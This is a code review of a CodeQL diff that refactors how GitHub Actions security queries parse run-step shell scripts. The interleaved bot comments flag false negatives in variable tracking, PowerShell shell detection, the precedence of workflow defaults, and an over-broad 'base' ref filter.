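Review bot: `cmdReachingRunExpr` at the end of the hunk follows a command substitution through at most one intermediate assignment (`VAR2=$(cmd)` then `$VAR2` in the written expression), and it does not compose with `envReachingRunExpr`, so `A=$(cmd); B=$A; echo "X=$B" >> $GITHUB_ENV` is not reported although the command output reaches the file write. A small recursive helper over `script.getAnAssignment` — var reaches var2 directly via `containsParameterExpansion`, or transitively through another assignment — used by both predicates would cover such chains without touching the replacement machinery above. If single-hop is deliberate for performance, a comment on both predicates, `// NOTE: only one level of variable indirection is followed`, would stop the resulting false negatives being read as bugs.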
@@ -0,0 +1,50 @@ +private import codeql.actions.Ast + +class PowerShellScript extends ShellScript { + PowerShellScript() { + exists(Run run | + this = run.getScript() and + run.getShell().matches("pwsh%") + ) + } + + override string getStmt(int i) { none() } + + override string getAStmt() { none() } + + override string getCommand(int i) { none() } + + override string getACommand() { none() } + + override string getFileReadCommand(int i) { none() } + + override string getAFileReadCommand() { none() } + + override predicate getAssignment(int i, string name, string data) { none() } + + override predicate getAnAssignment(string name, string data) { none() } + + override predicate getAWriteToGitHubEnv(string name, string data) { none() } + + override predicate getAWriteToGitHubOutput(string name, string data) { none() } + + override predicate getAWriteToGitHubPath(string data) { none() } + + override predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field) { none() } + + override predicate getACmdReachingGitHubOutputWrite(string cmd, string output_field) { none() } + + override predicate getAnEnvReachingGitHubEnvWrite(string var, string output_field) { none() } + + override predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field) { none() } + + override predicate getAnEnvReachingGitHubPathWrite(string var) { none() } + + override predicate getACmdReachingGitHubPathWrite(string cmd) { none() } + + override predicate fileToGitHubEnv(string path) { none() } + + override predicate fileToGitHubOutput(string path) { none() } + + override predicate fileToGitHubPath(string path) { none() } +} diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index eaf1ae871a9f..43772a978c58 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
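Review bot: `PowerShellScript` only matches `run.getShell().matches("pwsh%")`, but GitHub Actions also accepts `shell: powershell` (Windows PowerShell 5.1), which is common on `windows-*` runners; such steps land in no `ShellScriptImpl` subclass and silently produce no GITHUB_ENV/GITHUB_OUTPUT/GITHUB_PATH facts. `run.getShell().matches(["pwsh%", "powershell%"])` keeps both in this class. Since every member is `none()`, a class-level comment stating that PowerShell scripts are intentionally not parsed yet — so writes like `"name=..." >> $env:GITHUB_ENV` are false negatives for now — would help readers of the results, especially as `write-output` was just removed from the Bash regexes, presumably on the assumption that this class would take it over.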
@@ -62,6 +62,7 @@ private newtype TAstNode = n.lookup("jobs") instanceof YamlMapping } or TRunsNode(YamlMapping n) { exists(CompositeActionImpl a | a.getNode().lookup("runs") = n) } or + TDefaultsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("defaults") = n) } or TInputsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("inputs") = n) } or TInputNode(YamlValue n) { exists(YamlMapping m | m.lookup("inputs").(YamlMapping).maps(n, _)) } or TOutputsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("outputs") = n) } or @@ -141,6 +142,19 @@ abstract class AstNodeImpl extends TAstNode { env.getParentNode().getAChildNode*() = this ) } + + ScalarValueImpl getInScopeDefaultValue(string name, string prop) { + exists(DefaultsImpl dft | + this.getEnclosingJob().getNode().(YamlMapping).maps(_, dft.getNode()) and + result = dft.getValue(name, prop) + ) + or + not exists(DefaultsImpl dft | this.getEnclosingJob() = dft.getParentNode()) and + exists(DefaultsImpl dft | + this.getEnclosingWorkflow().getNode().(YamlMapping).maps(_, dft.getNode()) and + result = dft.getValue(name, prop) + ) + } } class ScalarValueImpl extends AstNodeImpl, TScalarValueNode { 
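Review bot: In `getInScopeDefaultValue` the second disjunct skips the workflow-level `defaults` whenever the job has any `defaults` block, even one that does not define the requested `name`/`prop` (a job setting only `run.working-directory` hides a workflow-level `run.shell`); as I read GitHub's documentation, only a default with the same name overrides, so the workflow value should still apply in that case. Tightening the guard to a job-level value that actually exists fixes it: `not exists(DefaultsImpl dft | this.getEnclosingJob().getNode().(YamlMapping).maps(_, dft.getNode()) and exists(dft.getValue(name, prop)))`. The two disjuncts also locate job-level defaults differently (`maps(_, dft.getNode())` vs `dft.getParentNode()`), which silently depends on `getAChildNode` being transitive for jobs; using the same test in both removes that dependency. `TDefaultsNode` above admits any mapping under a `defaults` key, including e.g. an action input or `with:` argument named `defaults` — fine if intended, but worth a comment.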
@@ -165,6 +179,61 @@ class ScalarValueImpl extends AstNodeImpl, TScalarValueNode { string getValue() { result = value.getValue() } } +class ShellScriptImpl extends ScalarValueImpl { + ShellScriptImpl() { exists(YamlMapping run | run.lookup("run").(YamlScalar) = this.getNode()) } + + string getRawScript() { result = this.getValue().regexpReplaceAll("\\\\\\s*\n", "") } + + RunImpl getEnclosingRun() { result.getNode().lookup("run") = this.getNode() } + + abstract string getStmt(int i); + + abstract string getAStmt(); + + abstract string getCommand(int i); + + string getACommand() { + if this.getEnclosingRun().getShell().matches("bash%") + then result = this.(BashShellScript).getACommand() + else + if this.getEnclosingRun().getShell().matches("pwsh%") + then result = this.(PowerShellScript).getACommand() + else result = "NOT IMPLEMENTED" + } + + abstract string getFileReadCommand(int i); + + abstract string getAFileReadCommand(); + + abstract predicate getAssignment(int i, string name, string data); + + abstract predicate getAnAssignment(string name, string data); + + abstract predicate getAWriteToGitHubEnv(string name, string data); + + abstract predicate getAWriteToGitHubOutput(string name, string data); + + abstract predicate getAWriteToGitHubPath(string data); + + abstract predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field); + + abstract predicate getACmdReachingGitHubOutputWrite(string cmd, string output_field); + + abstract predicate getAnEnvReachingGitHubEnvWrite(string var, string output_field); + + abstract predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field); + + abstract predicate getAnEnvReachingGitHubPathWrite(string var); + + abstract predicate getACmdReachingGitHubPathWrite(string cmd); + + abstract predicate fileToGitHubEnv(string path); + + abstract predicate fileToGitHubOutput(string path); + + abstract predicate fileToGitHubPath(string path); +} + class ExpressionImpl extends AstNodeImpl, TExpressionNode { 
YamlNode key; YamlString value; @@ -493,6 +562,28 @@ class InputsImpl extends AstNodeImpl, TInputsNode { } } +class DefaultsImpl extends AstNodeImpl, TDefaultsNode { + YamlMapping n; + + DefaultsImpl() { this = TDefaultsNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override AstNodeImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "DefaultsImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + ScalarValueImpl getValue(string name, string prop) { + n.lookup(name).(YamlMapping).lookup(prop) = result.getNode() + } +} + class InputImpl extends AstNodeImpl, TInputNode { YamlValue n; @@ -1314,20 +1405,18 @@ class ExternalJobImpl extends JobImpl, UsesImpl { class RunImpl extends StepImpl { YamlScalar script; + ScalarValueImpl scriptScalar; - RunImpl() { this.getNode().lookup("run") = script } - - string getScript() { result = script.getValue().regexpReplaceAll("\\\\\\s*\n", "") } - - ScalarValueImpl getScriptScalar() { result = TScalarValueNode(script) } - - ExpressionImpl getAnScriptExpr() { result.getParentNode().getNode() = script } + RunImpl() { + this.getNode().lookup("run") = script and + scriptScalar = TScalarValueNode(script) + } override string toString() { if exists(this.getId()) then result = "Run Step: " + this.getId() else result = "Run Step" } - /** Gets the working directory for this `runs` mapping. */ + /** Gets the working directory for this `run` mapping. */ string getWorkingDirectory() { if exists(n.lookup("working-directory").(YamlString).getValue()) then 
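Review bot: `ShellScriptImpl.getACommand()` is the only member of the new class that is not abstract; it re-dispatches on the shell prefix (duplicating the subclasses' characteristic predicates) and returns the literal `"NOT IMPLEMENTED"` for any other shell, which then flows into consumers such as `GitCommandSource` as if it were command text. Declaring it `abstract string getACommand();` like its siblings makes unsupported shells yield nothing, consistent with the rest of the class. A class comment noting that a `run` step whose shell matches neither `bash%` nor `pwsh%` belongs to no subclass and therefore produces no GITHUB_ENV/OUTPUT/PATH facts is worth adding, since that is a silent false negative rather than an error. The enclosing `ExpressionImpl` class continues outside the hunk.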
@@ -1339,268 +1428,19 @@ class RunImpl extends StepImpl { else result = "GITHUB_WORKSPACE/" } - private string lineProducer(int i) { - result = script.getValue().regexpReplaceAll("\\\\\\s*\n", "").splitAt("\n", i) - } - - private predicate cmdSubstitutionReplacement(string cmdSubs, string id, int k) { - exists(string line | line = this.lineProducer(k) | - exists(int i, int j | - cmdSubs = - // $() cmd substitution - line.regexpFind("\\$\\((?:[^()]+|\\((?:[^()]+|\\([^()]*\\))*\\))*\\)", i, j) - .regexpReplaceAll("^\\$\\(", "") - .regexpReplaceAll("\\)$", "") and - id = "cmdsubs:" + k + ":" + i + ":" + j - ) - or - exists(int i, int j | - // `...` cmd substitution - cmdSubs = - line.regexpFind("\\`[^\\`]+\\`", i, j) - .regexpReplaceAll("^\\`", "") - .regexpReplaceAll("\\`$", "") and - id = "cmd:" + k + ":" + i + ":" + j - ) - ) - } - - private predicate rankedCmdSubstitutionReplacements(int i, string old, string new) { - old = rank[i](string old2 | this.cmdSubstitutionReplacement(old2, _, _) | old2) and - this.cmdSubstitutionReplacement(old, new, _) - } - - private predicate doReplaceCmdSubstitutions(int line, int round, string old, string new) { - round = 0 and - old = this.lineProducer(line) and - new = old - or - round > 0 and - exists(string middle, string target, string replacement | - this.doReplaceCmdSubstitutions(line, round - 1, old, middle) and - this.rankedCmdSubstitutionReplacements(round, target, replacement) and - new = middle.replaceAll(target, replacement) - ) - } - - private string cmdSubstitutedLineProducer(int i) { - // script lines where any command substitution has been replaced with a unique placeholder - result = - max(int round, string new | - this.doReplaceCmdSubstitutions(i, round, _, new) - | - new order by round - ) - or - this.cmdSubstitutionReplacement(result, _, i) - } - - private predicate quotedStringReplacement(string quotedStr, string id) { - exists(string line, int k | line = this.cmdSubstitutedLineProducer(k) | - exists(int i, int 
j | - // double quoted string - quotedStr = line.regexpFind("\"((?:[^\"\\\\]|\\\\.)*)\"", i, j) and - id = - "qstr:" + k + ":" + i + ":" + j + ":" + quotedStr.length() + ":" + - quotedStr.regexpReplaceAll("[^a-zA-Z0-9]", "") - ) - or - exists(int i, int j | - // single quoted string - quotedStr = line.regexpFind("'((?:\\\\.|[^'\\\\])*)'", i, j) and - id = - "qstr:" + k + ":" + i + ":" + j + ":" + quotedStr.length() + ":" + - quotedStr.regexpReplaceAll("[^a-zA-Z0-9]", "") - ) - ) - } - - private predicate rankedQuotedStringReplacements(int i, string old, string new) { - old = rank[i](string old2 | this.quotedStringReplacement(old2, _) | old2) and - this.quotedStringReplacement(old, new) - } - - private predicate doReplaceQuotedStrings(int line, int round, string old, string new) { - round = 0 and - old = this.cmdSubstitutedLineProducer(line) and - new = old - or - round > 0 and - exists(string middle, string target, string replacement | - this.doReplaceQuotedStrings(line, round - 1, old, middle) and - this.rankedQuotedStringReplacements(round, target, replacement) and - new = middle.replaceAll(target, replacement) - ) - } - - private string quotedStringLineProducer(int i) { - result = - max(int round, string new | this.doReplaceQuotedStrings(i, round, _, new) | new order by round) - } - - private string stmtProducer(int i) { - result = this.quotedStringLineProducer(i).splitAt(Bash::splitSeparator()).trim() and - // when splitting the line with a separator that is not present, the result is the original line which may contain other separators - // we only one the split parts that do not contain any of the separators - not result.indexOf(Bash::splitSeparator()) > -1 - } - - private predicate doStmtRestoreQuotedStrings(int line, int round, string old, string new) { - round = 0 and - old = this.stmtProducer(line) and - new = old - or - round > 0 and - exists(string middle, string target, string replacement | - this.doStmtRestoreQuotedStrings(line, round - 1, old, 
middle) and - this.rankedQuotedStringReplacements(round, target, replacement) and - new = middle.replaceAll(replacement, target) - ) - } - - private string restoredStmtQuotedStringLineProducer(int i) { - result = - max(int round, string new | - this.doStmtRestoreQuotedStrings(i, round, _, new) - | - new order by round - ) - } - - private predicate doStmtRestoreCmdSubstitutions(int line, int round, string old, string new) { - round = 0 and - old = this.restoredStmtQuotedStringLineProducer(line) and - new = old - or - round > 0 and - exists(string middle, string target, string replacement | - this.doStmtRestoreCmdSubstitutions(line, round - 1, old, middle) and - this.rankedCmdSubstitutionReplacements(round, target, replacement) and - new = middle.replaceAll(replacement, target) - ) - } - - string getStmt(int i) { - result = - max(int round, string new | - this.doStmtRestoreCmdSubstitutions(i, round, _, new) - | - new order by round - ) - } - - string getAStmt() { result = this.getStmt(_) } - - private string cmdProducer(int i) { - result = this.quotedStringLineProducer(i).splitAt(Bash::separator()).trim() and - // when splitting the line with a separator that is not present, the result is the original line which may contain other separators - // we only one the split parts that do not contain any of the separators - not result.indexOf(Bash::separator()) > -1 - } - - private predicate doCmdRestoreQuotedStrings(int line, int round, string old, string new) { - round = 0 and - old = this.cmdProducer(line) and - new = old - or - round > 0 and - exists(string middle, string target, string replacement | - this.doCmdRestoreQuotedStrings(line, round - 1, old, middle) and - this.rankedQuotedStringReplacements(round, target, replacement) and - new = middle.replaceAll(replacement, target) - ) - } - - private string restoredCmdQuotedStringLineProducer(int i) { - result = - max(int round, string new | - this.doCmdRestoreQuotedStrings(i, round, _, new) - | - new order by round - ) 
- } - - private predicate doCmdRestoreCmdSubstitutions(int line, int round, string old, string new) { - round = 0 and - old = this.restoredCmdQuotedStringLineProducer(line) and - new = old - or - round > 0 and - exists(string middle, string target, string replacement | - this.doCmdRestoreCmdSubstitutions(line, round - 1, old, middle) and - this.rankedCmdSubstitutionReplacements(round, target, replacement) and - new = middle.replaceAll(replacement, target) - ) - } - - string getCmd(int i) { - result = - max(int round, string new | - this.doCmdRestoreCmdSubstitutions(i, round, _, new) - | - new order by round - ) - } - - string getACmd() { result = this.getCmd(_) } - - string getCommand(int i) { - result = this.getCmd(i) and - // exclude variable declarations - not result.regexpMatch("^[a-zA-Z0-9\\-_]+=") and - // exclude the following keywords - not result = - [ - "", "for", "in", "do", "done", "if", "then", "else", "elif", "fi", "while", "until", "case", - "esac", "{", "}" - ] - } - - string getACommand() { result = this.getCommand(_) } - - predicate getAssignment(int i, string name, string value) { - exists(string stmt | - stmt = this.getStmt(i) and - name = stmt.regexpCapture("^([a-zA-Z0-9\\-_]+)=.*", 1) and - value = stmt.regexpCapture("^[a-zA-Z0-9\\-_]+=(.*)", 1) - ) - } - - predicate getAnAssignment(string name, string value) { this.getAssignment(_, name, value) } - - predicate getAWriteToGitHubEnv(string name, string value) { - exists(string raw | - Bash::extractFileWrite(this.getScript(), "GITHUB_ENV", raw) and - Bash::extractVariableAndValue(raw, name, value) - ) - } - - predicate getAWriteToGitHubOutput(string name, string value) { - exists(string raw | - Bash::extractFileWrite(this.getScript(), "GITHUB_OUTPUT", raw) and - Bash::extractVariableAndValue(raw, name, value) - ) - } - - predicate getAWriteToGitHubPath(string value) { - Bash::extractFileWrite(this.getScript(), "GITHUB_PATH", value) - } - - predicate getAnEnvReachingGitHubOutputWrite(string var, 
string output_field) { - Bash::envReachingGitHubFileWrite(this, var, "GITHUB_OUTPUT", output_field) - } - - predicate getACmdReachingGitHubOutputWrite(string cmd, string output_field) { - Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_OUTPUT", output_field) + /** Gets the shell for this `run` mapping. */ + string getShell() { + if exists(n.lookup("shell").(YamlString).getValue()) + then result = n.lookup("shell").(YamlString).getValue() + else + if exists(this.getInScopeDefaultValue("run", "shell")) + then result = this.getInScopeDefaultValue("run", "shell").getValue() + else result = "bash" } - predicate getAnEnvReachingGitHubEnvWrite(string var, string output_field) { - Bash::envReachingGitHubFileWrite(this, var, "GITHUB_ENV", output_field) - } + ShellScriptImpl getScript() { result = scriptScalar } - predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field) { - Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_ENV", output_field) - } + ExpressionImpl getAnScriptExpr() { result.getParentNode().getNode() = script } } /** diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 8a6e52309fb2..5ceab79820bc 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -282,7 +282,7 @@ private class RunTree extends StandardPreOrderTree instanceof Run { ( child = super.getInScopeEnvVarExpr(_) or child = super.getAnScriptExpr() or - child = super.getScriptScalar() + child = super.getScript() ) and l = child.getLocation() | diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index f1fb2073ed0d..b30fd5495ed3 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
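Review bot: `getShell()` falls back to `"bash"` when neither the step nor an in-scope `defaults.run.shell` sets one, but the GitHub-hosted default is `pwsh` on Windows runners, so a `windows-*` job without an explicit shell is analysed by the Bash parser (whose `>> $GITHUB_ENV` patterns will mostly not match PowerShell syntax, giving silence rather than false positives). If `runs-on` is reachable from the job node, checking for a literal `windows%` label before the `"bash"` default would be more faithful; otherwise document the assumption next to the fallback: `// GitHub defaults to bash on Linux/macOS runners and pwsh on Windows; Windows steps without an explicit shell are treated as bash here.` As far as I recall composite actions require `shell:` on every `run` step, so the fallback only matters for workflow files.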
@@ -86,7 +86,8 @@ class GitCommandSource extends RemoteFlowSource, CommandSource { exists(Uses uses | checkout = uses and uses.getCallee() = "actions/checkout" and - exists(uses.getArgument("ref")) + exists(uses.getArgument("ref")) and + not uses.getArgument("ref").matches("%base%") ) or checkout instanceof GitMutableRefCheckout @@ -97,9 +98,9 @@ class GitCommandSource extends RemoteFlowSource, CommandSource { or checkout instanceof GhSHACheckout ) and - this.asExpr() = run.getScriptScalar() and + this.asExpr() = run.getScript() and checkout.getAFollowingStep() = run and - run.getACommand() = cmd and + run.getScript().getACommand() = cmd and cmd.indexOf("git") = 0 and untrustedGitCommandsDataModel(cmd_regex, flag) and cmd.regexpMatch(cmd_regex) @@ -127,8 +128,8 @@ class GitHubEventPathSource extends RemoteFlowSource, CommandSource { // PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH}) // BODY=$(jq -r '.issue.body' "$GITHUB_EVENT_PATH" | sed -n '3p') GitHubEventPathSource() { - this.asExpr() = run.getScriptScalar() and - run.getACommand() = cmd and + this.asExpr() = run.getScript() and + run.getScript().getACommand() = cmd and cmd.matches("jq%") and cmd.matches("%GITHUB_EVENT_PATH%") and exists(string regexp | @@ -207,10 +208,11 @@ private class CheckoutSource extends RemoteFlowSource, FileSource { // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround // instead of using ActionsMutableRefCheckout and ActionsSHACheckout - exists(Uses u | - this.asExpr() = u and - u.getCallee() = "actions/checkout" and - exists(u.getArgument("ref")) + exists(Uses uses | + this.asExpr() = uses and + uses.getCallee() = "actions/checkout" and + exists(uses.getArgument("ref")) and + not uses.getArgument("ref").matches("%base%") ) or this.asExpr() instanceof GitMutableRefCheckout 
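Review bot: The added filter `not uses.getArgument("ref").matches("%base%")` in GitCommandSource is a case-sensitive substring test, so it silently drops any `ref` expression that merely contains the letters `base` (an input or env name such as `codebase_ref`, or a `rebase-*` branch literal), while a differently-cased `BASE` still passes; a checkout of attacker-controlled content can therefore escape the source. If the intent is to exclude the PR base revision, matching the concrete expression path, e.g. `not uses.getArgument("ref").matches("%pull_request.base.%")`, or a word-bounded `regexpMatch`, would be tighter. The same substring test is introduced in the CheckoutSource hunk of this file and in the OutputClobberingFromFileReadSink hunk of OutputClobberingQuery.qll; one shared predicate would keep the three in step.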
diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 787a5f720845..0f7e906685b1 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -23,7 +23,7 @@ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlo exists(Run run, string var, string field | run.getInScopeEnvVarExpr(var) = pred.asExpr() and succ.asExpr() = run and - Bash::envReachingGitHubFileWrite(run, var, "GITHUB_OUTPUT", field) and + run.getScript().getAnEnvReachingGitHubOutputWrite(var, field) and c = any(DataFlow::FieldContent ct | ct.getName() = field) ) } @@ -35,8 +35,8 @@ predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow:: run.getInScopeEnvVarExpr(var) = pred.asExpr() and // we store the taint on the enclosing job since the may not exist an implicit env attribute succ.asExpr() = run.getEnclosingJob() and - Bash::envReachingGitHubFileWrite(run, var, "GITHUB_ENV", field) and - c = any(DataFlow::FieldContent ct | ct.getName() = field) //and + run.getScript().getAnEnvReachingGitHubEnvWrite(var, field) and + c = any(DataFlow::FieldContent ct | ct.getName() = field) ) } @@ -55,12 +55,12 @@ predicate commandToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Dat or exists(FileSource source | source.asExpr().(Step).getAFollowingStep() = run and - Bash::outputsPartialFileContent(run, cmd) + run.getScript().getAFileReadCommand() = cmd ) ) and - Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_OUTPUT", key) and + run.getScript().getACmdReachingGitHubOutputWrite(cmd, key) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and - pred.asExpr() = run.getScriptScalar() and + pred.asExpr() = run.getScript() and succ.asExpr() = run ) } 
@@ -80,12 +80,12 @@ predicate commandToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFl or exists(FileSource source | source.asExpr().(Step).getAFollowingStep() = run and - Bash::outputsPartialFileContent(run, cmd) + run.getScript().getAFileReadCommand() = cmd ) ) and - Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_ENV", key) and + run.getScript().getACmdReachingGitHubEnvWrite(cmd, key) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and - pred.asExpr() = run.getScriptScalar() and + pred.asExpr() = run.getScript() and // we store the taint on the enclosing job since there may not be an implicit env attribute succ.asExpr() = run.getEnclosingJob() ) diff --git a/ql/lib/codeql/actions/dataflow/TaintSteps.qll b/ql/lib/codeql/actions/dataflow/TaintSteps.qll index de64a0dd6f4c..e9d5a44c929a 100644 --- a/ql/lib/codeql/actions/dataflow/TaintSteps.qll +++ b/ql/lib/codeql/actions/dataflow/TaintSteps.qll @@ -22,14 +22,14 @@ class AdditionalTaintStep extends Unit { } /** - * A download artifact step followed by a step that may use downloaded artifacts. + * A file source step followed by a Run step may read the file. */ predicate fileDownloadToRunStep(DataFlow::Node pred, DataFlow::Node succ) { exists(FileSource source, Run run | pred = source and source.asExpr().(Step).getAFollowingStep() = run and - succ.asExpr() = run.getScriptScalar() and - Bash::outputsPartialFileContent(run, run.getACommand()) + succ.asExpr() = run.getScript() and + exists(run.getScript().getAFileReadCommand()) ) } diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll index 18ff398ebab2..a0309437292a 100644 --- a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll 
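Review bot: The rewritten doc comment on fileDownloadToRunStep in TaintSteps.qll, `* A file source step followed by a Run step may read the file.`, reads as a claim about runtime behaviour rather than a description of the predicate and is missing a relative clause. Suggested wording: `* Holds if `pred` is a file source step and `succ` is the script of a later Run step that contains a file read command.` That also records the new, looser condition, which only requires that some file read command exist in the script rather than one tied to the downloaded path, so readers of the query results know why a `cat` of an unrelated file still produces a step.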
@@ -17,11 +17,11 @@ abstract class ArgumentInjectionSink extends DataFlow::Node { bindingset[var] predicate envToArgInjSink(string var, Run run, string command) { exists(string argument, string cmd, string regexp, int command_group, int argument_group | - run.getACommand() = cmd and + run.getScript().getACommand() = cmd and argumentInjectionSinksDataModel(regexp, command_group, argument_group) and command = cmd.regexpCapture(regexp, command_group) and argument = cmd.regexpCapture(regexp, argument_group) and - Bash::envReachingRunExpr(run, var, argument) and + Bash::envReachingRunExpr(run.getScript(), var, argument) and exists(run.getInScopeEnvVarExpr(var)) ) } @@ -40,15 +40,15 @@ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { ArgumentInjectionFromEnvVarSink() { exists(Run run, string var | envToArgInjSink(var, run, command) and - run.getScriptScalar() = this.asExpr() and + run.getScript() = this.asExpr() and exists(run.getInScopeEnvVarExpr(var)) ) or exists( Run run, string cmd, string argument, string regexp, int argument_group, int command_group | - run.getACommand() = cmd and - run.getScriptScalar() = this.asExpr() and + run.getScript().getACommand() = cmd and + run.getScript() = this.asExpr() and argumentInjectionSinksDataModel(regexp, command_group, argument_group) and argument = cmd.regexpCapture(regexp, argument_group) and command = cmd.regexpCapture(regexp, command_group) and @@ -75,8 +75,8 @@ class ArgumentInjectionFromCommandSink extends ArgumentInjectionSink { int command_group | run = source.getEnclosingRun() and - this.asExpr() = run.getScriptScalar() and - cmd = run.getACommand() and + this.asExpr() = run.getScript() and + cmd = run.getScript().getACommand() and argumentInjectionSinksDataModel(regexp, command_group, argument_group) and argument = cmd.regexpCapture(regexp, argument_group) and command = cmd.regexpCapture(regexp, command_group) 
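Review bot: In envToArgInjSink the call `Bash::envReachingRunExpr(run.getScript(), var, argument)` is the one remaining module-level `Bash::` helper in this file, while every sibling check in the same hunks (`getACommand`, the `*ReachingGitHub*Write` family) has been moved onto the script object returned by `run.getScript()`. If that helper stays in the `Bash` module on purpose, a one-line comment saying so would stop the next reader from treating it as a leftover; otherwise exposing it as `run.getScript().getAnEnvReachingExpr(var, argument)` (name is a placeholder) would make this predicate read like the rest of the refactor. This is a style observation only; the logic of the hunk is unchanged.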
@@ -106,8 +106,8 @@ private module ArgumentInjectionConfig implements DataFlow::ConfigSig { exists( Run run, string argument, string cmd, string regexp, int command_group, int argument_group | - run.getScriptScalar() = source.asExpr() and - run.getACommand() = cmd and + run.getScript() = source.asExpr() and + run.getScript().getACommand() = cmd and argumentInjectionSinksDataModel(regexp, command_group, argument_group) and argument = cmd.regexpCapture(regexp, argument_group) and argument.regexpMatch(".*\\$(\\{)?(GITHUB_HEAD_REF).*") @@ -119,7 +119,7 @@ private module ArgumentInjectionConfig implements DataFlow::ConfigSig { predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Run run, string var | run.getInScopeEnvVarExpr(var) = pred.asExpr() and - succ.asExpr() = run.getScriptScalar() and + succ.asExpr() = run.getScript() and envToArgInjSink(var, run, _) ) } diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 31a9edd03b30..d06b125ca322 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -155,15 +155,21 @@ class ActionsGitHubScriptDownloadStep extends UntrustedArtifactDownloadStep, Use } override string getPath() { - if this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + if + this.getAFollowingStep() + .(Run) + .getScript() + .getACommand() + .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = normalizePath(trimQuotes(this.getAFollowingStep() .(Run) + .getScript() .getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) else - if this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp()) + if this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp()) then result = "GITHUB_WORKSPACE/" else none() } 
@@ -172,31 +178,37 @@ class ActionsGitHubScriptDownloadStep extends UntrustedArtifactDownloadStep, Use class GHRunArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { GHRunArtifactDownloadStep() { // eg: - run: gh run download ${{ github.event.workflow_run.id }} --repo "${GITHUB_REPOSITORY}" --name "artifact_name" - this.getACommand().regexpMatch(".*gh\\s+run\\s+download.*") and - this.getACommand().matches("%github.event.workflow_run.id%") and + this.getScript().getACommand().regexpMatch(".*gh\\s+run\\s+download.*") and + this.getScript().getACommand().matches("%github.event.workflow_run.id%") and ( - this.getACommand().regexpMatch(unzipRegexp()) or - this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp()) + this.getScript().getACommand().regexpMatch(unzipRegexp()) or + this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp()) ) } override string getPath() { if - this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or - this.getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + this.getAFollowingStep() + .(Run) + .getScript() + .getACommand() + .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or + this.getScript().getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = - normalizePath(trimQuotes(this.getACommand() + normalizePath(trimQuotes(this.getScript() + .getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) or result = normalizePath(trimQuotes(this.getAFollowingStep() .(Run) + .getScript() .getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) else if - this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp()) or - this.getACommand().regexpMatch(unzipRegexp()) + this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp()) or + this.getScript().getACommand().regexpMatch(unzipRegexp()) then result = "GITHUB_WORKSPACE/" else none() } 
